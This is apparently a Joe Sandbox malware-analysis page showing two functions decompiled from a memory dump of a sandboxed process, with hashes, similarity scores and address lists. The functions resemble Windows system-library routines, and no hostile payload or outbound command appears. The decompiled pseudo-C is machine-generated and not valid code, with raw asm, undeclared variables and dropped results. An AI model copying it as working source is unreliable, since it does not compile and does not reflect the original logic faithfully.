API String ID:
Opcode ID: 11135b26afce80963531c8ccd18fb63c43eef5be961e1dc1fbd7d09fe3ab63ae
Instruction ID: d8f5f56ac4651a601d1243b5374cccc18aad952fe34854ce840760c757a06760
Opcode Fuzzy Hash: 11135b26afce80963531c8ccd18fb63c43eef5be961e1dc1fbd7d09fe3ab63ae
Instruction Fuzzy Hash: 1F226F70E0021AABDF18DF95D480ABEFBF7BF44304B14845AE955AB251E734FA81DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04D484BB Relevance: .4, Instructions: 386
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E04D484BB(void* __ebx, signed int __ecx, void* __edx, void* __eflags, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed char _v40;
				signed int _v44;
				signed int _v48;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t152;
				signed int _t157;
				signed int _t158;
				intOrPtr _t167;
				signed char _t186;
				signed char _t196;
				signed int _t198;
				signed int _t199;
				signed char _t203;
				signed int _t218;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				intOrPtr _t223;
				signed int _t226;
				signed int _t230;
				signed int _t233;
				signed int _t236;
				signed int _t237;
				intOrPtr _t238;
				signed int _t240;
				signed int _t242;
				signed char _t244;
				signed int _t245;
				signed int _t248;
				signed int _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t264;
				signed int _t265;
				signed int _t268;
				signed char _t270;
				void* _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t282;
				signed int _t286;
				signed int _t287;
				void* _t295;
				signed int _t296;
				void* _t297;
				void* _t298;
				signed int _t299;
				signed int _t301;
				void* _t302;

				_v12 = __ecx;
				_v24 = 0;
				_v6 = 0;
				_v16 = 0;
				_v5 = 0;
				_v28 = 0;
				_t295 = __edx;
				_push(__edx);
				_v36 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				if(E04CE81A0(__ebx, _t275, __edx, __eflags) != 0) {
					_t233 =  *(__edx + 4);
					_t258 = _t233;
					_push(__ebx);
					_t218 =  *(__edx + 2) & 0x0000ffff;
					_t276 = _t218;
					_v32 = _t276;
					__eflags = _t276;
					if(_t276 >= 0) {
						_v48 = _t233;
					} else {
						asm("sbb edx, edx");
						_t258 =  ~_t258 & _t233 + __edx;
						_v48 = _t258;
					}
					__eflags = _t258;
					if(_t258 != 0) {
						_t259 =  *(_t295 + 8);
						__eflags = _t276;
						if(_t276 >= 0) {
							_v20 = _t259;
						} else {
							asm("sbb edi, edi");
							_v20 =  ~_t259 & _t259 + _t295;
							_t276 = _v32;
						}
						__eflags = _t218 & 0x00000010;
						if((_t218 & 0x00000010) == 0) {
							L30:
							_t277 = _v12;
							_t236 = _t218 & 0x00002010 | 0x00000800;
							_v32 = _t236;
							__eflags = _t277;
							if(_t277 == 0) {
								_t260 = 0;
								__eflags = 0;
								L35:
								__eflags = _t260;
								if(_t260 != 0) {
									_t248 = _t236 | 0x00002000;
									__eflags = _t248;
									_v32 = _t248;
								}
								L37:
								_t219 = _t218 & 0x0000ffff;
								goto L38;
							}
							_t196 =  *(_t277 + 2) & 0x0000ffff;
							_t270 = _t196;
							__eflags = _t196 & 0x00000010;
							if((_t196 & 0x00000010) == 0) {
								goto L37;
							}
							__eflags = _t270;
							_t260 =  *(_t277 + 0xc);
							if(_t270 < 0) {
								asm("sbb edx, edx");
								_t260 =  ~_t260 & _t260 + _t277;
							}
							goto L35;
						} else {
							_t230 =  *(_t295 + 0xc);
							__eflags = _t276;
							if(_t276 >= 0) {
								_t198 = _t230;
								_v40 = _t198;
							} else {
								asm("sbb edi, edi");
								_v40 =  ~_t230 & _t230 + _t295;
								_t276 = _v32;
								_t198 = _v40;
							}
							__eflags = _t198;
							if(_t198 == 0) {
								_t218 =  *(_t295 + 2) & 0x0000ffff;
								goto L30;
							} else {
								_t199 =  *(_t295 + 2) & 0x0000ffff;
								__eflags = _t199 & 0x00002800;
								if((_t199 & 0x00002800) != 0) {
									L28:
									_v32 = _t199 & 0x00002010 | 0x00000800;
									_v24 = _v40;
									L27:
									_t219 =  *(_t295 + 2) & 0x0000ffff;
									_t277 = _v12;
									L38:
									_t152 = _t219 & 0x0000ffff;
									_v40 = _t152;
									__eflags = _t219 & 0x00000004;
									if((_t219 & 0x00000004) == 0) {
										L56:
										_t221 = _t219 & 0x00000004 | 0x00001400;
										__eflags = _t221;
										L57:
										_t237 = _v16;
										L58:
										_v12 = 0x0000000b + ( *(_v48 + 1) & 0x000000ff) * 0x00000004 & 0xfffffffc;
										_t157 = _v20;
										__eflags = _t157;
										if(_t157 == 0) {
											_t296 = 0;
											__eflags = 0;
										} else {
											_t296 = 0x0000000b + ( *(_t157 + 1) & 0x000000ff) * 0x00000004 & 0xfffffffc;
										}
										_t158 = _v24;
										__eflags = _t158;
										if(_t158 == 0) {
											_t261 = 0;
											__eflags = 0;
										} else {
											_t261 = ( *(_t158 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc;
										}
										_v40 = _t261;
										__eflags = _t237;
										if(_t237 == 0) {
											_t278 = 0;
											__eflags = 0;
										} else {
											_t278 = ( *(_t237 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc;
										}
										_t238 =  *0x4da5d78; // 0x0
										_t240 = E04CC5D90(_t238 + 0x140000, _v36, _t238 + 0x140000, _t278 + _t261 + _t296 + _v12 + 0x14);
										_v28 = _t240;
										__eflags = _t240;
										if(_t240 != 0) {
											E04CD92F5(_t162, _t240);
											_t297 = _t240 + 0x14;
											 *(_t240 + 2) =  *(_t240 + 2) | _v32 | 0x00008000;
											_t264 = _v24;
											__eflags = _t264;
											if(_t264 == 0) {
												__eflags = 0;
											} else {
												E04CF88C0(_t297, _t264,  *(_t264 + 2) & 0x0000ffff);
												_t240 = _v28;
												_t302 = _t302 + 0xc;
												_t297 = _t297 + _v40;
												_push(0x14);
												_pop(0);
											}
											 *((intOrPtr*)(_t240 + 0xc)) = 0;
											 *(_t240 + 2) =  *(_t240 + 2) | _t221;
											_t265 = _v16;
											__eflags = _t265;
											if(_t265 == 0) {
												_t167 = 0;
												__eflags = 0;
											} else {
												E04CF88C0(_t297, _t265,  *(_t265 + 2) & 0x0000ffff);
												_t240 = _v28;
												_t302 = _t302 + 0xc;
												_t167 = _t297 - _t240;
												_t297 = _t297 + _t278;
											}
											 *((intOrPtr*)(_t240 + 0x10)) = _t167;
											E04CF88C0(_t297, _v48, 8 + ( *(_v48 + 1) & 0x000000ff) * 4);
											_t222 = _v28;
											_t298 = _t297 + _v12;
											_t242 = _v20;
											 *((intOrPtr*)(_t222 + 4)) = _t297 - _t222;
											__eflags = _t242;
											if(_t242 != 0) {
												E04CF88C0(_t298, _t242, 8 + ( *(_t242 + 1) & 0x000000ff) * 4);
												_t299 = _t298 - _t222;
												__eflags = _t299;
												 *(_t222 + 8) = _t299;
											}
											_t279 = 0;
											__eflags = 0;
										} else {
											_t279 = 0xc0000017;
										}
										__eflags = _v5;
										_t223 = _v36;
										if(_v5 != 0) {
											E04CC3BC0(_t223, 0, _v16);
										}
										L81:
										__eflags = _v6;
										if(_v6 != 0) {
											E04CC3BC0(_t223, 0, _v24);
										}
										goto L83;
									}
									_t268 =  *(_t295 + 0x10);
									_t237 = _t268;
									__eflags = _t152;
									if(_t152 < 0) {
										asm("sbb ecx, ecx");
										_t237 =  ~_t237 & _t268 + _t295;
										__eflags = _t237;
										_t152 = _v40;
									}
									__eflags = _t237;
									if(_t237 == 0) {
										goto L56;
									} else {
										__eflags = _t219 & 0x00001400;
										if((_t219 & 0x00001400) != 0) {
											L55:
											_v16 = _t237;
											_t221 = _t219 & 0x00001004 | 0x00000400;
											goto L58;
										}
										__eflags = _t277;
										if(_t277 == 0) {
											goto L55;
										}
										_t226 =  *(_t295 + 8);
										__eflags = _t152;
										if(_t152 < 0) {
											asm("sbb ebx, ebx");
											__eflags = _t226;
											_t152 = _v40;
										}
										_t282 =  *(_t295 + 4);
										__eflags = _t152;
										if(_t152 < 0) {
											asm("sbb edi, edi");
											_t282 =  ~_t282 & _t282 + _t295;
											__eflags = _v40;
											if(_v40 < 0) {
												asm("sbb edx, edx");
												__eflags = _t268;
											}
										}
										_t301 = _v12;
										_t186 =  *(_t301 + 2) & 0x0000ffff;
										_t244 = _t186;
										__eflags = _t186 & 0x00000004;
										if((_t186 & 0x00000004) != 0) {
											__eflags = _t244;
											_t245 =  *(_t301 + 0x10);
											if(_t244 < 0) {
												asm("sbb ecx, ecx");
												__eflags = _t245;
											}
										} else {
											_t245 = 0;
										}
										_t279 = E04D47CE8(_t245, _t268, _a8, _a12, _t282, _t226, _a16,  &_v16,  &_v44);
										__eflags = _t279;
										if(_t279 < 0) {
											_t223 = _v36;
											goto L81;
										} else {
											_v5 = 1;
											_t221 = _v44 & 0x00001408 | 0x00000004;
											goto L57;
										}
									}
								}
								__eflags = _v12;
								if(_v12 == 0) {
									goto L28;
								}
								__eflags = _t276;
								if(_t276 < 0) {
									asm("sbb edx, edx");
									_t259 =  ~_t259 & _t259 + _t295;
									__eflags = _t276;
									if(_t276 < 0) {
										asm("sbb ecx, ecx");
										_t233 =  ~_t233 & _t233 + _t295;
										__eflags = _t276;
										if(_t276 < 0) {
											asm("sbb ebx, ebx");
											__eflags = _t230;
										}
									}
								}
								_t203 =  *(_v12 + 2) & 0x0000ffff;
								_v40 = _t203;
								_t286 = _v12;
								__eflags = _t203 & 0x00000010;
								if((_t203 & 0x00000010) != 0) {
									__eflags = _v40;
									_t287 =  *(_t286 + 0xc);
									if(_v40 < 0) {
										asm("sbb edi, edi");
										__eflags = _t287;
									}
								} else {
									_t287 = 0;
								}
								_t279 = E04D47CE8(_t287, _t230, _a8, _a12, _t233, _t259, _a16,  &_v24,  &_v44);
								__eflags = _t279;
								if(_t279 < 0) {
									goto L83;
								} else {
									_t207 = _v44;
									_v6 = 1;
									_t255 = ((_v44 & 0x00000008 | 0x00000004) + (_v44 & 0x00000008 | 0x00000004) | _t207 & 0x00001400) + ((_v44 & 0x00000008 | 0x00000004) + (_v44 & 0x00000008 | 0x00000004) | _t207 & 0x00001400);
									__eflags = _t255;
									_v32 = _t255;
									goto L27;
								}
							}
						}
					} else {
						_t279 = 0xc0000079;
						L83:
						goto L84;
					}
				} else {
					_t279 = 0xc0000079;
					L84:
					 *_a4 = _v28;
					return _t279;
				}
			}

0x04d484c5
0x04d484c8
0x04d484cb
0x04d484ce
0x04d484d1
0x04d484d4
0x04d484df
0x04d484e4
0x04d484e5
0x04d484ef
0x04d484fb
0x04d484fe
0x04d48500
0x04d48501
0x04d48505
0x04d48507
0x04d4850a
0x04d4850d
0x04d4851d
0x04d4850f
0x04d48514
0x04d48516
0x04d48518
0x04d48518
0x04d48520
0x04d48522
0x04d4852e
0x04d48531
0x04d48534
0x04d48549
0x04d48536
0x04d4853d
0x04d48541
0x04d48544
0x04d48544
0x04d4854c
0x04d4854f
0x04d48654
0x04d48654
0x04d4865f
0x04d48665
0x04d48668
0x04d4866a
0x04d48689
0x04d48689
0x04d4868b
0x04d4868b
0x04d4868d
0x04d4868f
0x04d4868f
0x04d48695
0x04d48695
0x04d48698
0x04d48698
0x00000000
0x04d48698
0x04d4866c
0x04d48670
0x04d48672
0x04d48674
0x00000000
0x00000000
0x04d48676
0x04d48679
0x04d4867c
0x04d48683
0x04d48685
0x04d48685
0x00000000
0x04d48555
0x04d48555
0x04d48558
0x04d4855b
0x04d48573
0x04d48575
0x04d4855d
0x04d48564
0x04d48568
0x04d4856b
0x04d4856e
0x04d4856e
0x04d48578
0x04d4857a
0x04d48650
0x00000000
0x04d48580
0x04d48580
0x04d48584
0x04d48589
0x04d4863b
0x04d48645
0x04d4864b
0x04d48632
0x04d48632
0x04d48636
0x04d4869b
0x04d4869b
0x04d4869e
0x04d486a1
0x04d486a4
0x04d48779
0x04d4877c
0x04d4877c
0x04d48782
0x04d48782
0x04d48785
0x04d48796
0x04d48799
0x04d4879c
0x04d4879e
0x04d487b0
0x04d487b0
0x04d487a0
0x04d487ab
0x04d487ab
0x04d487b2
0x04d487b5
0x04d487b7
0x04d487c5
0x04d487c5
0x04d487b9
0x04d487c0
0x04d487c0
0x04d487c7
0x04d487ca
0x04d487cc
0x04d487da
0x04d487da
0x04d487ce
0x04d487d5
0x04d487d5
0x04d487dc
0x04d487ff
0x04d48801
0x04d48804
0x04d48806
0x04d48812
0x04d4881a
0x04d48822
0x04d48826
0x04d48829
0x04d4882b
0x04d48847
0x04d4882d
0x04d48834
0x04d48839
0x04d4883c
0x04d4883f
0x04d48842
0x04d48844
0x04d48844
0x04d48849
0x04d4884c
0x04d48850
0x04d48853
0x04d48855
0x04d48871
0x04d48871
0x04d48857
0x04d4885e
0x04d48863
0x04d48868
0x04d4886b
0x04d4886d
0x04d4886d
0x04d48873
0x04d48887
0x04d4888c
0x04d48891
0x04d48896
0x04d4889c
0x04d4889f
0x04d488a1
0x04d488b1
0x04d488b9
0x04d488b9
0x04d488bb
0x04d488bb
0x04d488be
0x04d488be
0x04d48808
0x04d48808
0x04d48808
0x04d488c0
0x04d488c4
0x04d488c7
0x04d488cf
0x04d488cf
0x04d488d9
0x04d488d9
0x04d488dd
0x04d488e5
0x04d488e5
0x00000000
0x04d488dd
0x04d486aa
0x04d486ad
0x04d486af
0x04d486b2
0x04d486b9
0x04d486bb
0x04d486bb
0x04d486bd
0x04d486bd
0x04d486c0
0x04d486c2
0x00000000
0x04d486c8
0x04d486c8
0x04d486ce
0x04d48768
0x04d4876e
0x04d48771
0x00000000
0x04d48771
0x04d486d4
0x04d486d6
0x00000000
0x00000000
0x04d486dc
0x04d486df
0x04d486e2
0x04d486e9
0x04d486eb
0x04d486ed
0x04d486ed
0x04d486f0
0x04d486f3
0x04d486f6
0x04d486fd
0x04d486ff
0x04d48704
0x04d48707
0x04d4870e
0x04d48710
0x04d48710
0x04d48707
0x04d48712
0x04d48715
0x04d48719
0x04d4871b
0x04d4871d
0x04d48723
0x04d48726
0x04d48729
0x04d48730
0x04d48732
0x04d48732
0x04d4871f
0x04d4871f
0x04d4871f
0x04d4874c
0x04d4874e
0x04d48750
0x04d488d6
0x00000000
0x04d48756
0x04d4875f
0x04d48763
0x00000000
0x04d48763
0x04d48750
0x04d486c2
0x04d4858f
0x04d48593
0x00000000
0x00000000
0x04d48599
0x04d4859c
0x04d485a3
0x04d485a5
0x04d485a7
0x04d485aa
0x04d485b1
0x04d485b3
0x04d485b5
0x04d485b8
0x04d485bf
0x04d485c1
0x04d485c1
0x04d485b8
0x04d485aa
0x04d485c6
0x04d485cc
0x04d485cf
0x04d485d2
0x04d485d4
0x04d485da
0x04d485df
0x04d485e2
0x04d485eb
0x04d485ed
0x04d485ed
0x04d485d6
0x04d485d6
0x04d485d6
0x04d4860b
0x04d4860d
0x04d4860f
0x00000000
0x04d48615
0x04d48615
0x04d4861d
0x04d4862d
0x04d4862d
0x04d4862f
0x00000000
0x04d4862f
0x04d4860f
0x04d4857a
0x04d48524
0x04d48524
0x04d488ea
0x00000000
0x04d488ea
0x04d484f1
0x04d484f1
0x04d488eb
0x04d488f1
0x04d488f8
0x04d488f8

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc3c8c978ba0b914dfaa4f93e79378fbab052349ef6fc70600d580d74180ec0a
Instruction ID: beb5747299661536d6bb7643b1d66b565d92ef11cab04690628dc13bfabe67ea
Opcode Fuzzy Hash: cc3c8c978ba0b914dfaa4f93e79378fbab052349ef6fc70600d580d74180ec0a
Instruction Fuzzy Hash: 50D1F079E006098BDF15DF69C850AFEB7F2BFC8394F188129E855A7240E735F901AB60

Uniqueness

Uniqueness Score: -1.00%

Function 04CB64F0 Relevance: .4, Instructions: 383
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E04CB64F0(void* __ebx, void* __ecx, void* __edx, void* __edi, signed int _a4, signed int _a8, intOrPtr _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				intOrPtr* _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				char _v52;
				signed int _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				intOrPtr _v72;
				intOrPtr* _t167;
				intOrPtr _t168;
				intOrPtr _t169;
				char _t170;
				signed short _t178;
				signed int _t183;
				signed int _t191;
				signed int _t197;
				signed int _t198;
				signed int _t202;
				signed int _t206;
				signed int _t209;
				intOrPtr _t211;
				signed int _t231;
				intOrPtr _t232;
				signed int _t241;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t246;
				signed int _t247;
				intOrPtr _t248;
				intOrPtr _t250;
				signed int _t252;
				signed int _t259;
				signed int _t260;
				signed int _t262;
				signed int* _t265;
				intOrPtr _t267;
				signed int _t270;
				signed int _t276;
				signed int* _t278;
				signed int* _t281;
				signed int _t282;
				intOrPtr _t284;
				intOrPtr _t285;
				signed int _t286;
				intOrPtr _t289;
				intOrPtr* _t290;
				void* _t292;
				signed int _t293;
				intOrPtr _t297;
				signed int _t300;
				void* _t302;
				intOrPtr _t303;
				signed int _t311;
				signed int _t317;
				void* _t319;

				_t319 = (_t317 & 0xfffffff8) - 0x3c;
				_t241 = 0;
				_v61 = 0;
				_t167 = __ecx + 0xb4;
				_v40 = 0;
				_v52 = 0;
				_v48 = 0;
				_v56 = 0;
				_v60 = 0;
				_v24 = _t167;
				if(__edx == _t167) {
					_t168 =  *_t167;
					_v61 = _t168 != 0;
					_v60 = _t168 == 0;
					goto L7;
				} else {
					 *_t167 = 0;
					_t183 =  &_v12;
					_v8 = _t183;
					_v12 = _t183;
					_t259 = _a8 * 8 - _a8;
					_t185 = __edx + _t259 * 4;
					_t260 = _a4;
					_t17 = _t185 + 4; // 0x14
					_v28 = __edx + _t259 * 4;
					_t300 = _t260;
					 *_t17 =  *_t17 - 1 + _t260;
					_t311 = (_t260 << 4) + __edx;
					_t262 = __edx + 0x10 + (_t260 * 8 - _t260) * 4;
					do {
						_t191 =  *(_t311 - 0x10);
						_t311 = _t311 - 0x10;
						_t262 = _t262 - 0x1c;
						_v32 = _t191;
						_t300 = _t300 - 1;
						_v44 = _t262;
						if(_t191 != 0) {
							if(_v61 != 0) {
								_v36 = _t191 + 0x14;
								E04CF8C00(_t262 - 0x10, _t311, 0x10);
								_t319 = _t319 + 0xc;
								 *((intOrPtr*)(_v44 + 8)) = _v28;
								L04CC2330(_v44, _v36);
								_t265 = _v36 + 0x18;
								_v20 = _t265;
								_t286 = _t265[1];
								_t197 =  *_t265;
								_v24 = _t197;
								if( *_t286 != _t265) {
									L59:
									asm("int 0x29");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_t267 = _v72;
									_t198 = _t197 | 0xffffffff;
									asm("lock xadd [ecx], eax");
									if(_t198 == 0) {
										 *0x4da91e0(_t267, _t311);
										return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t267 + 4))))))();
									}
									return _t198;
								} else {
									_t202 = _v44;
									 *_t202 = _t265;
									 *(_t202 + 4) = _t286;
									 *_t286 = _t202;
									_t265[1] = _t202;
									E04CC24D0(_v36);
									_v52 = _v52 + 1;
									if(_v24 != _v20) {
										goto L24;
									} else {
										_t281 = _v8;
										_t197 = _v32 + 0xc;
										_t250 = _v56;
										if( *_t281 !=  &_v12) {
											goto L59;
										} else {
											 *(_t197 + 4) = _t281;
											 *_t197 =  &_v12;
											_t241 = _t250 + 1;
											 *_t281 = _t197;
											_v8 = _t197;
											_v56 = _t241;
											goto L23;
										}
									}
								}
							} else {
								_t282 = _v24;
								_v61 = 1;
								 *_t282 = _t191;
								 *((intOrPtr*)(_t282 + 4)) =  *((intOrPtr*)(_t311 + 4));
								 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t311 + 8));
								 *((intOrPtr*)(_t282 + 0xc)) =  *((intOrPtr*)(_t311 + 0xc));
								L23:
								_t289 = _v48;
								L24:
								_t262 = _v44;
								goto L4;
							}
						} else {
							_t289 = _v48;
							_v60 = 1;
							goto L4;
						}
						goto L72;
						L4:
					} while (_t300 != 0);
					_t206 = _a4 - 1;
					if(_t289 != _t206) {
						_t290 = _v28;
						asm("lock xadd [ecx], eax");
						if((_t206 | 0xffffffff) == 0) {
							_t232 =  *0x4da6644; // 0x0
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t232 + 0x300000,  *_t290);
						}
					}
					if(_t241 != 0) {
						_t209 =  &_v12 - 0xc;
						_t302 = _v12 + 0xfffffff4;
						_t270 = 0xfffffffe;
						_v16 = _t209;
						_t311 = 0;
						_v44 = 0xfffffffe;
						if(_t302 != _t209) {
							_t248 = 0;
							do {
								_t231 = E04CF6600(1,  *(_t302 + 4), 0);
								_t270 = _v44;
								_t311 = _t311 | _t231;
								if(_t270 != 0xffffffff) {
									if(_t270 != 0xfffffffe) {
										if(_t270 ==  *(_t302 + 4)) {
											goto L41;
										} else {
											_t270 = _t270 | 0xffffffff;
											goto L40;
										}
										while(1) {
											L48:
											_t197 = _v12;
											if(_t197 ==  &_v12) {
												break;
											}
											_t292 =  *_t197;
											if( *(_t292 + 4) != _t197) {
												goto L59;
											} else {
												_t276 =  *(_t197 + 4);
												if( *_t276 != _t197) {
													goto L59;
												} else {
													 *_t276 = _t292;
													 *(_t292 + 4) = _t276;
													_t293 = _t197;
													_t197 =  *((intOrPtr*)(_t303 + 0x14)) + ( *(_t197 - 8) +  *(_t197 - 8) * 2) * 4;
													_t278 =  *(_t197 + 4);
													if( *_t278 != _t197) {
														goto L59;
													} else {
														 *_t293 = _t197;
														 *(_t293 + 4) = _t278;
														 *_t278 = _t293;
														 *(_t197 + 4) = _t293;
														continue;
													}
												}
											}
											goto L72;
										}
										if(_v52 != 0) {
											_t245 = _v52;
											do {
												asm("bsr esi, ebx");
												E04CC24D0( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 0x188);
												asm("btr ebx, esi");
											} while (_t245 != 0);
											_t241 = _v56;
											_t311 = _v40;
										}
										if(_t311 != 0) {
											_t246 = _v40;
											do {
												asm("bsr esi, ebx");
												E04CC24D0( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 8);
												asm("btr ebx, esi");
											} while (_t246 != 0);
											_t241 = _v56;
										}
										goto L7;
									} else {
										_t270 =  *(_t302 + 4);
										L40:
										_v44 = _t270;
									}
								}
								L41:
								_t302 =  *((intOrPtr*)(_t302 + 0xc)) - 0xc;
							} while (_t302 != _v16);
							_v52 = _t248;
							_t241 = _v56;
							_v40 = _t311;
						}
						_t303 = _a12;
						E04CABD3D(_t303, _t270);
						_t211 = _v52;
						_v16 = _t311;
						if(_t311 != 0) {
							_t247 = _t311;
							do {
								asm("bsf esi, ebx");
								L04CC2330( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 8,  *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 8);
								asm("btr ebx, esi");
							} while (_t247 != 0);
							_t241 = _v56;
							_t311 = _v40;
							_t211 = _v52;
						}
						if(_t211 != 0) {
							_t244 = _v52;
							do {
								asm("bsf esi, ebx");
								L04CC2330( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 0x188,  *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 0x188);
								asm("btr ebx, esi");
							} while (_t244 != 0);
							_t241 = _v56;
							_t311 = _v40;
						}
						goto L48;
					} else {
						L7:
						_t169 = _a12;
						_t252 =  *(_t169 + 8);
						_t284 =  *((intOrPtr*)(_t169 + 0xc));
						do {
							_t170 =  *((intOrPtr*)(_t169 + 0xe4));
							_t297 = _t284;
							_v32 = _t252;
							_v58 = 0;
							_v59 = 0;
							_v57 = _t170;
							_t285 = _t297 + _t241;
							_v28 = _t285;
							if(_t170 == 0) {
								_t178 = (_t252 - 0x00000001 ^ _t252) & 0x0000ffff ^ _t252;
								_t252 = _t178;
								if(_v60 != 0) {
									_t252 = (_t252 >> 0x00000010) - 0x00000001 << 0x00000010 | _t178 & 0x0000ffff;
								}
								if(_v61 == 0) {
									if(_t285 == 0) {
										_v58 = 1;
										_t252 = _t252 ^ (_t252 + 0x00000001 ^ _t252) & 0x0000ffff;
									} else {
										_t285 = _t285 - 1;
										_v28 = _t285;
									}
								}
								if(_t241 != 0 || _v60 != _t241) {
									if(_t285 != 0) {
										if((_t252 & 0xffff0000) == 0) {
											_t252 = _t252 + 0x10000;
											_v59 = 1;
										}
									}
								}
							}
							_t284 = _t297;
							asm("lock cmpxchg8b [esi]");
							_t241 = _v56;
							_t252 = _v32;
							_t169 = _a12;
						} while (_t252 != _v32 || _t284 != _t297);
						if(_v59 != 0) {
							_push( *((intOrPtr*)(_t169 + 0x24)));
							E04CF40A0();
						}
						 *_a16 = _v58;
						return _v57;
					}
				}
				L72:
			}

0x04cb64f8
0x04cb64fc
0x04cb64fe
0x04cb6503
0x04cb6509
0x04cb6511
0x04cb6519
0x04cb6521
0x04cb6525
0x04cb6529
0x04cb6531
0x04d10eef
0x04d10ef3
0x04d10efa
0x00000000
0x04cb6537
0x04cb6537
0x04cb6539
0x04cb653d
0x04cb6541
0x04cb654f
0x04cb6551
0x04cb6554
0x04cb6557
0x04cb655a
0x04cb6560
0x04cb6565
0x04cb6573
0x04cb657a
0x04cb6580
0x04cb6580
0x04cb6583
0x04cb6586
0x04cb6589
0x04cb658d
0x04cb658e
0x04cb6594
0x04cb6688
0x04cb6715
0x04cb671e
0x04cb6727
0x04cb6732
0x04cb6735
0x04cb673e
0x04cb6741
0x04cb6745
0x04cb6748
0x04cb674a
0x04cb6750
0x04cb68f1
0x04cb68f6
0x04cb68f8
0x04cb68f9
0x04cb68fa
0x04cb68fb
0x04cb68fc
0x04cb68fd
0x04cb68fe
0x04cb68ff
0x04cb6905
0x04cb6908
0x04cb690b
0x04cb690f
0x04cb691e
0x00000000
0x04cb6926
0x04cb6912
0x04cb6756
0x04cb6756
0x04cb675e
0x04cb6760
0x04cb6763
0x04cb6765
0x04cb6768
0x04cb6776
0x04cb677e
0x00000000
0x04cb6784
0x04cb6784
0x04cb6790
0x04cb6795
0x04cb6799
0x00000000
0x04cb679f
0x04cb67a3
0x04cb67a6
0x04cb67a8
0x04cb67a9
0x04cb67ab
0x04cb67af
0x00000000
0x04cb67af
0x04cb6799
0x04cb677e
0x04cb668e
0x04cb668e
0x04cb6692
0x04cb6697
0x04cb669c
0x04cb66a2
0x04cb66a8
0x04cb66ab
0x04cb66ab
0x04cb66af
0x04cb66af
0x00000000
0x04cb66af
0x04cb659a
0x04cb659a
0x04cb659e
0x00000000
0x04cb659e
0x00000000
0x04cb65a3
0x04cb65a3
0x04cb65aa
0x04cb65ad
0x04cb66f7
0x04cb6701
0x04cb6705
0x04d10f06
0x04d10f1a
0x04d10f1a
0x04cb6705
0x04cb65b5
0x04cb67c0
0x04cb67c3
0x04cb67c6
0x04cb67cb
0x04cb67cf
0x04cb67d1
0x04cb67d7
0x04cb67d9
0x04cb67e0
0x04cb67ea
0x04cb67ef
0x04cb67f3
0x04cb67fa
0x04cb67ff
0x04d10f27
0x00000000
0x04d10f2d
0x04d10f2d
0x00000000
0x04d10f2d
0x04cb6870
0x04cb6870
0x04cb6870
0x04cb687a
0x00000000
0x00000000
0x04cb687c
0x04cb6881
0x00000000
0x04cb6883
0x04cb6883
0x04cb6888
0x00000000
0x04cb688a
0x04cb688a
0x04cb688c
0x04cb688f
0x04cb689a
0x04cb689d
0x04cb68a2
0x00000000
0x04cb68a4
0x04cb68a4
0x04cb68a6
0x04cb68a9
0x04cb68ab
0x00000000
0x04cb68ab
0x04cb68a2
0x04cb6888
0x00000000
0x04cb6881
0x04cb68b5
0x04cb68e8
0x04d10f64
0x04d10f67
0x04d10f76
0x04d10f7b
0x04d10f7e
0x04d10f82
0x04d10f86
0x04d10f86
0x04cb68b9
0x04cb68bf
0x04cb68c3
0x04cb68c6
0x04cb68d3
0x04cb68d8
0x04cb68db
0x04cb68df
0x04cb68df
0x00000000
0x04cb6805
0x04cb6805
0x04cb6808
0x04cb6808
0x04cb6808
0x04cb67ff
0x04cb680c
0x04cb680f
0x04cb6812
0x04cb6818
0x04cb681c
0x04cb6820
0x04cb6820
0x04cb6824
0x04cb682b
0x04cb6830
0x04cb6834
0x04cb683a
0x04cb683c
0x04cb6840
0x04cb6843
0x04cb6850
0x04cb6855
0x04cb6858
0x04cb685c
0x04cb6860
0x04cb6864
0x04cb6864
0x04cb686a
0x04d10f35
0x04d10f39
0x04d10f3c
0x04d10f4b
0x04d10f50
0x04d10f53
0x04d10f57
0x04d10f5b
0x04d10f5b
0x00000000
0x04cb65bb
0x04cb65bb
0x04cb65bb
0x04cb65be
0x04cb65c4
0x04cb65d0
0x04cb65d0
0x04cb65d6
0x04cb65d8
0x04cb65dc
0x04cb65e1
0x04cb65e6
0x04cb65ea
0x04cb65ed
